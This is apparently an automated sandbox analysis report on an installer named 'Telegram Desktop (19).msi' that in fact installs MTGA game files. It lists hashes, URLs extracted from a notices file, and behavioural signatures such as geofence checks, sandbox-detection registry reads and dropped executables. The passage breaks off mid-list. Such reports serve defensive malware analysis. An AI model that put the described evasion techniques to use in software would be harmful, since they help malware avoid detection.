Analysis
-
max time kernel
272s -
max time network
304s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
26-11-2022 05:41
Static task
static1
Behavioral task
behavioral1
Sample
Telegram Desktop (19).msi
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
Telegram Desktop (19).msi
Resource
win10v2004-20220812-en
General
-
Target
Telegram Desktop (19).msi
-
Size
188.9MB
-
MD5
0f4b7f6da9b1375839b3e96dd2ca8c3d
-
SHA1
d7c72fa3e4972152dda761682ab3e80b44842283
-
SHA256
251dba4d350685d32c16d0b555a1dc13d095d7a64399d01e9d9149f22a23dc1c
-
SHA512
928395df18eacf4b189e0d04fb9c4ed9df90c406717dfc8f1e98a7cb0ed64d97848a6c34522005a58d647d340f96c28f50ccb8526e80e7079a06dc7ce7f25c41
-
SSDEEP
3145728:t8eWmtYoa0bEut/C6LOJCIx7p0pQMyAC5kndaZcee3iaASySuiNfX1XlL:tlTtYBcEs3KCIx7qWMjTeEOSyJiv
Malware Config
Extracted
C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\ThirdPartyNotices.txt
https://www.chromium.org/Home
https://bitbucket.org/chromiumembedded/cef
https://github.com/ValveSoftware/openvr/blob/master/headers/openvr_api.cs
https://github.com/facebook-csharp-sdk/simple-json
http://www.opensource.org/licenses/mit-license.php
https://github.com/Real-Serious-Games/C-Sharp-Promise
https://www.x.org/wiki/
https://bitbucket.org/chromiumembedded/cef/
https://github.com/bazelbuild/bazel
https://github.com/dequelabs/axe-core/
https://raw.githubusercontent.com/GoogleChrome/accessibility-developer-tools/master/dist/js/axs_testing.js
https://aomedia.googlesource.com/aom/
http://code.google.com/p/angleproject/
http://lcamtuf.coredump.cx/afl/
http://source.android.com/
https://chromium.googlesource.com/chromium/src.git/+/master/third_party/android_crazy_linker/
https://developer.android.com/reference/android/util/FloatProperty.html
http://www.apache.org/licenses/LICENSE-2.0
https://android.googlesource.com/platform/frameworks/support
https://android.googlesource.com/platform/packages/apps/Settings/
https://developer.android.com/reference/android/support/design/widget/BottomNavigationView.html
http://developer.apple.com/
https://chromium.googlesource.com/android_tools.git/+/master/sdk/sources/android-23/android/os/AsyncTask.java
http://www.daemonology.net/bsdiff/
http://software.blackmagicdesign.com/DeckLink/v10.7/Blackmagic_DeckLink_SDK_10.7.zip
https://github.com/liblouis/liblouis
https://chromium.googlesource.com/breakpad/breakpad
http://www.opensource.apple.com/apsl/
https://github.com/google/brotli
https://github.com/google/crc32c
https://chromium.googlesource.com/external/github.com/GoogleChrome/custom-tabs-client
http://www.apache.org/licenses/
http://code.google.com/p/google-axs-chrome/
http://github.com/google/closure-compiler
http://caminobrowser.org/
http://www.mozilla.org/MPL/
https://github.com/google/compact_enc_det
https://github.com/google/cld3
https://crashpad.chromium.org/
http://www.opensource.apple.com/
http://www.apple.com/legal/guidelinesfor3rdparties.html
http://www.netlib.org/fp/
http://sourceforge.net/projects/expat/
https://github.com/google/flatbuffers
http://www.flotcharts.org/
http://www.freetype.org/
http://www.freetype.org
http://android-gifview.googlecode.com/svn/!svn/bc/8/trunk/
https://chromium.googlesource.com/chromium/src/+/master/third_party/cacheinvalidation/README.chromium
https://github.com/googlei18n/google-input-tools.git
https://github.com/google/google-toolbox-for-mac
https://github.com/googlevr/gvr-android-sdk
http://www.mozilla.org/MPL/2.0/
http://www.mozilla.org/MPL/2.0/FAQ.html
http://freetype.sourceforge.net/license.html
http://source.icu-project.org/repos/icu/icu/trunk/license.html
http://icu-project.org/userguide/icufaq.html
http://www.unicode.org/copyright.html
http://www.unicode.org/Public/
http://www.unicode.org/reports/
http://www.unicode.org/cldr/data/
http://jquery.com/
https://github.com/jquery/jquery/blob/master/MIT-LICENSE.txt
https://github.com/jquery/sizzle/blob/master/LICENSE
http://ctrio.sourceforge.net/
https://cla.developers.google.com/clas
http://www.openssl.org/)"
http://www.cisl.ucar.edu/css/software/fftpack5/ftpk.html
https://github.com/google/glslang
https://www.khronos.org/registry/
https://github.com/square/haha
http://www.linuxfoundation.org/collaborate/workgroups/accessibility/iaccessible2
http://www.opensource.org/licenses/bsd-license.php
http://site.icu-project.org/
http://developer.mozilla.org/en-US/docs/Accessibility/AT-APIs
https://github.com/googlei18n/libphonenumber/
http://www.khronos.org/registry
http://oss.sgi.com/projects/FreeB/
http://www.7-zip.org/sdk.html
https://github.com/square/leakcanary
https://github.com/google/leveldb.git
https://github.com/material-components/material-components-ios
https://github.com/google/material-design-icons
https://github.com/material-foundation/material-font-disk-loader-ios
https://github.com/material-foundation/material-internationalization-ios
https://github.com/material-foundation/material-roboto-font-loader-ios
https://github.com/material-foundation/material-sprited-animation-view-ios
https://github.com/material-foundation/material-text-accessibility-ios
https://android.googlesource.com/platform/development/+/b356564/samples/Support4Demos/src/com/example/android/supportv4/media/MediaController.java
https://github.com/material-motion/motion-interchange-objc
https://dxr.mozilla.org/mozilla-central/source/security/manager/
http://www.seanpatrickobrien.com/journal/posts/3
http://cgit.freedesktop.org/~aplattner/nvidia-settings/
http://www.mozilla.org/projects/nspr/
http://www.mozilla.org/projects/security/pki/nss/
http://mozilla.org/MPL/2.0/
https://github.com/khaledhosny/ots.git
http://www.openh264.org/
https://silver.arm.com/download/Software/Graphics/OX000-BU-00010-r1p0-00bet0/OX000-BU-00010-r1p0-00bet0.tgz
https://github.com/ValveSoftware/openvr
http://code.google.com/p/pdfium/
http://www.dabeaz.com/ply/ply-3.4.tar.gz
http://www.azillionmonkeys.com/qed/hash.html
https://android.googlesource.com/platform/external/perfetto/
http://www.polymer-project.org/
https://github.com/google/protobuf
https://github.com/jrmuizel/qcms/tree/v4
http://code.google.com/p/smhasher/
https://github.com/KhronosGroup/SPIRV-Tools.git
https://github.com/google/shaderc
https://skia.org/
http://google.github.io/snappy/
https://creativecommons.org/licenses/by/3.0/
https://sites.google.com/site/gaviotachessengine/Home/endgame-tablebases-1
http://www.ploscompbiol.org/static/license
http://www.gutenberg.org/ebooks/53
http://devel.freebsoft.org/speechd
http://www.strongtalk.org/
http://www.suitable.com/tools/smslib.html
http://www.suitable.com
https://swiftshader.googlesource.com/SwiftShader
http://www.chromium.org/
http://www.linux-usb.org/usb-ids.html
https://github.com/googlei18n/libaddressinput
http://code.google.com/p/v8
https://github.com/LunarG/VulkanTools/tree/master/include/vulkan
https://github.com/web-animations/web-animations-js
http://webkit.org/
http://www.webmproject.org/code/
http://developers.google.com/speed/webp
http://www.webrtc.org/
http://wtl.sourceforge.net/
http://tukaani.org/xz/
http://src.chromium.org/viewvc/chrome/trunk/deps/third_party/xz/COPYING
https://github.com/virustotal/yara
http://www.chromium.org/blink
http://www.torchmobile.com/
https://boringssl.googlesource.com/boringssl
https://github.com/mit-plv/fiat-crypto/blob/master/AUTHORS
http://lxr.mozilla.org/mozilla/source/toolkit/mozapps/update/src/updater/
https://github.com/mbostock/d3
https://github.com/y-256/libdivsufsort
https://github.com/chromium/dom-distiller
https://source.android.com/devices/graphics/testing.html
http://code.google.com/p/data-race-test/wiki/DynamicAnnotations
https://source.android.com/
http://www.netlib.org/fdlibm/
http://ffmpeg.org/
http://developer.intel.com/vtune/cbts/strmsimd/922down.htm
http://skal.planet-d.net/coding/dct.html
http://developer.intel.com/vtune/cbts/strmsimd/appnotes.htm
http://www.elecard.com/peter/idct.html
http://www.linuxvideo.org/mpeg2dec/
http://www.adel.nursat.kz/apg/
http://downloads.xiph.org/releases/flac/flac-1.3.1.tar.xz
https://chromium.googlesource.com/chromiumos/platform/gestures
https://github.com/google/glog
http://code.google.com/p/google-jstemplate/
http://harfbuzz.org/
http://hunspell.sourceforge.net/
http://bgoffice.sourceforge.net/
http://www.ijg.org/
http://opensource.org/licenses/bsd-license.php
https://sourceforge.net/project/?group_id=1519
http://chasen.aist-nara.ac.jp/chasen/distribution.html
http://casper.beckman.uiuc.edu/~c-tsai4
http://code.google.com/p/lao-dictionary/
http://lao-dictionary.googlecode.com/git/Lao-Dictionary.txt
http://lao-dictionary.googlecode.com/git/Lao-Dictionary-LICENSE.txt
https://chromium.googlesource.com/deps/inspector_protocol/
https://github.com/open-source-parsers/jsoncpp
http://llvm.org/docs/LibFuzzer.html
http://llvm.org
http://libcxx.llvm.org/
http://libcxxabi.llvm.org/
https://chromium.googlesource.com/chromiumos/platform/libevdev
http://libevent.org/
https://chromium.googlesource.com/external/webrtc
https://github.com/libjpeg-turbo/libjpeg-turbo/
http://libpng.org/
https://github.com/google/libprotobuf-mutator
https://git.gnome.org/browse/libsecret/
https://github.com/cisco/libsrtp
http://www.freedesktop.org/wiki/Software/systemd/
https://llvm.org/svn/llvm-project/libunwind/trunk/
http://libusb.org/
http://www.webmproject.org/
http://xmlsoft.org/
http://xmlsoft.org/XSLT
http://code.google.com/p/libyuv/
https://github.com/rentzsch/mach_override
http://rentzsch.com
http://opensource.org/licenses/mit
http://www.mesa3d.org/
https://chromium.googlesource.com/chromiumos/platform/minigbm
https://github.com/client9/stringencoders
http://modp.com/release/base64
http://www.math.sci.hiroshima-u.ac.jp/~m-mat/MT/MT2002/emt19937ar.html
http://code.google.com/p/nativeclient
http://sourceware.org/newlib/docs.html
http://sourceware.org/ml/newlib/
https://git.xiph.org/?p=opus.git;a=snapshot;h=3fe744ea04fdcc418fb85c2c133d13372ebb019b;sf=tgz
https://datatracker.ietf.org/ipr/1524/
https://datatracker.ietf.org/ipr/1914/
https://datatracker.ietf.org/ipr/1526/
https://github.com/google/re2
https://github.com/googlei18n/sfntly
https://github.com/simplejson/simplejson
https://sqlite.org/
http://gperftools.googlecode.com/
http://trevp.net/tlslite/
http://mxr.mozilla.org/comm-central/source/mozilla/netwerk/base/src/nsURLParsers.cpp
http://github.com/sctplab/usrsctp
https://code.google.com/p/sctp-refimpl/source/browse/trunk/COPYRIGHT
http://git.linuxtv.org/v4l-utils.git
http://valgrind.org/
https://github.com/google/woff2
http://freedesktop.org/
http://www.freedesktop.org/wiki/Software/xdg-user-dirs
http://www.tortall.net/projects/yasm/
http://zlib.net/
Signatures
-
Blocklisted process makes network request 6 IoCs
Processes:
msiexec.exemsiexec.exeflow pid process 10 1388 msiexec.exe 12 1388 msiexec.exe 14 1388 msiexec.exe 28 1388 msiexec.exe 39 1388 msiexec.exe 61 3188 msiexec.exe -
Executes dropped EXE 1 IoCs
Processes:
ChromeRecovery.exepid process 3820 ChromeRecovery.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.execmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation cmd.exe -
Loads dropped DLL 17 IoCs
Processes:
MsiExec.exeMsiExec.exepid process 4328 MsiExec.exe 4328 MsiExec.exe 4328 MsiExec.exe 4328 MsiExec.exe 4328 MsiExec.exe 4328 MsiExec.exe 4328 MsiExec.exe 4328 MsiExec.exe 4328 MsiExec.exe 4328 MsiExec.exe 4328 MsiExec.exe 4328 MsiExec.exe 4328 MsiExec.exe 2640 MsiExec.exe 2640 MsiExec.exe 2640 MsiExec.exe 4328 MsiExec.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\X: msiexec.exe -
Drops file in System32 directory 12 IoCs
Processes:
MsiExec.exedescription ioc process File opened for modification C:\Windows\SysWOW64\symbols\tmp\ResourceCleaner.pdb MsiExec.exe File opened for modification C:\Windows\SysWOW64\wntdll.pdb MsiExec.exe File opened for modification C:\Windows\SysWOW64\dll\wntdll.pdb MsiExec.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wntdll.pdb MsiExec.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\msi.pdb MsiExec.exe File opened for modification C:\Windows\SysWOW64\DLL\wkernel32.pdb MsiExec.exe File opened for modification C:\Windows\SysWOW64\tmp\ResourceCleaner.pdb MsiExec.exe File opened for modification C:\Windows\SysWOW64\msi.pdb MsiExec.exe File opened for modification C:\Windows\SysWOW64\dll\msi.pdb MsiExec.exe File opened for modification C:\Windows\SysWOW64\wkernel32.pdb MsiExec.exe File opened for modification C:\Windows\SysWOW64\symbols\DLL\wkernel32.pdb MsiExec.exe File opened for modification C:\Windows\SysWOW64\ResourceCleaner.pdb MsiExec.exe -
Drops file in Program Files directory 64 IoCs
Processes:
msiexec.exeelevation_service.exedescription ioc process File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\level10 msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\System.Diagnostics.StackTrace.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.PhysicsModule.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\Wizards.Mtga.Metadata.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\es.pak.info msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\ko.pak msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\lt.pak msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.Purchasing.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.TilemapModule.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.TLSModule.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\et.pak msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\fr.pak msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\ms.pak msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\StreamingAssets\UnityServicesProjectConfiguration.json msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\level3 msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\com.wizards.platform.sdk.unity.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\System.Buffers.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\System.Runtime.Serialization.Xml.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\Unity.Services.Core.Scheduler.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\version msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\level2.resS msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\System.Xml.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.Purchasing.SecurityStub.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.StreamingModule.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.UI.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA.exe msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\SQLitePCLRaw.batteries_v2.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.ClothModule.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.ProfilerModule.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\cs.pak msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\pt-PT.pak.info msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\sharedassets5.assets.resS msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\System.Runtime.Extensions.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\Unity.MemoryProfiler.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\Wizards.Mtga.Interfaces.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\fa.pak msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\ml.pak msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\nl.pak msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\nl.pak.info msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\StreamingAssets\Audio\GeneratedSoundBanks\Windows\STARTUP.bnk msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\System.Globalization.Extensions.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.Purchasing.WinRTCore.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\libGLESv2.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\bg.pak msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\ta.pak msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\th.pak msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\boot.config msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\UnityEngine.UnityConnectModule.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\pl.pak.info msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\ru.pak msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\tr.pak msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\widevinecdmadapter.dll msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\ca.pak.info msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\te.pak msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Resources\browser_assets msiexec.exe File created C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir1048_807589028\manifest.json elevation_service.exe File created C:\Program Files\Wizards of the Coast\MTGA\MonoBleedingEdge\etc\mono\2.0\Browsers\Compat.browser msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\id.pak msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\ml.pak.info msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\locales\pt-PT.pak msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Plugins\v8_context_snapshot.bin msiexec.exe File created C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir1048_807589028\ChromeRecovery.exe elevation_service.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\level1.resS msiexec.exe File created C:\Program Files\Wizards of the Coast\MTGA\MTGA_Data\Managed\Firebase.Analytics.dll msiexec.exe -
Drops file in Windows directory 27 IoCs
Processes:
msiexec.exedescription ioc process File opened for modification C:\Windows\Installer\e5885d5.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIF89D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI64E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF84E.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSIFF16.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFF84.tmp msiexec.exe File created C:\Windows\Installer\e5885d5.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI8AF5.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{FA8A9218-7326-4651-A12B-A1F9EE439F91} msiexec.exe File opened for modification C:\Windows\Installer\MSI8E23.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE57E.tmp msiexec.exe File opened for modification C:\Windows\Installer\{FA8A9218-7326-4651-A12B-A1F9EE439F91}\MTGALauncher.exe msiexec.exe File opened for modification C:\Windows\Installer\MSI25FC.tmp msiexec.exe File created C:\Windows\Installer\e5885d8.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI42DC.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI8EE0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8F4F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI13C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIEB6B.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI8E72.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI41.tmp msiexec.exe File created C:\Windows\Installer\{FA8A9218-7326-4651-A12B-A1F9EE439F91}\MTGALauncher.exe msiexec.exe File opened for modification C:\Windows\Installer\MSIF1C5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6950.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vssvc.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000789d96067ff55f5b0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000789d96060000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff000000000700010000680900789d9606000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000789d960600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000789d960600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4932 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
chrome.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Modifies data under HKEY_USERS 3 IoCs
Processes:
msiexec.exedescription ioc process Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1E\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f msiexec.exe -
Modifies registry class 24 IoCs
Processes:
msiexec.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\SourceList\PackageName = "Telegram Desktop (19).msi" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\SourceList\Media\DiskPrompt = "[1]" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\8129A8AF623715641AB21A9FEE34F919 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\SourceList\Media msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\SourceList\Media\1 = ";" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\9A7FC00C588A6FA44BE0726C586806C3\8129A8AF623715641AB21A9FEE34F919 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\8129A8AF623715641AB21A9FEE34F919\MainFeature msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\ProductName = "Setup" msiexec.exe Set value (int) 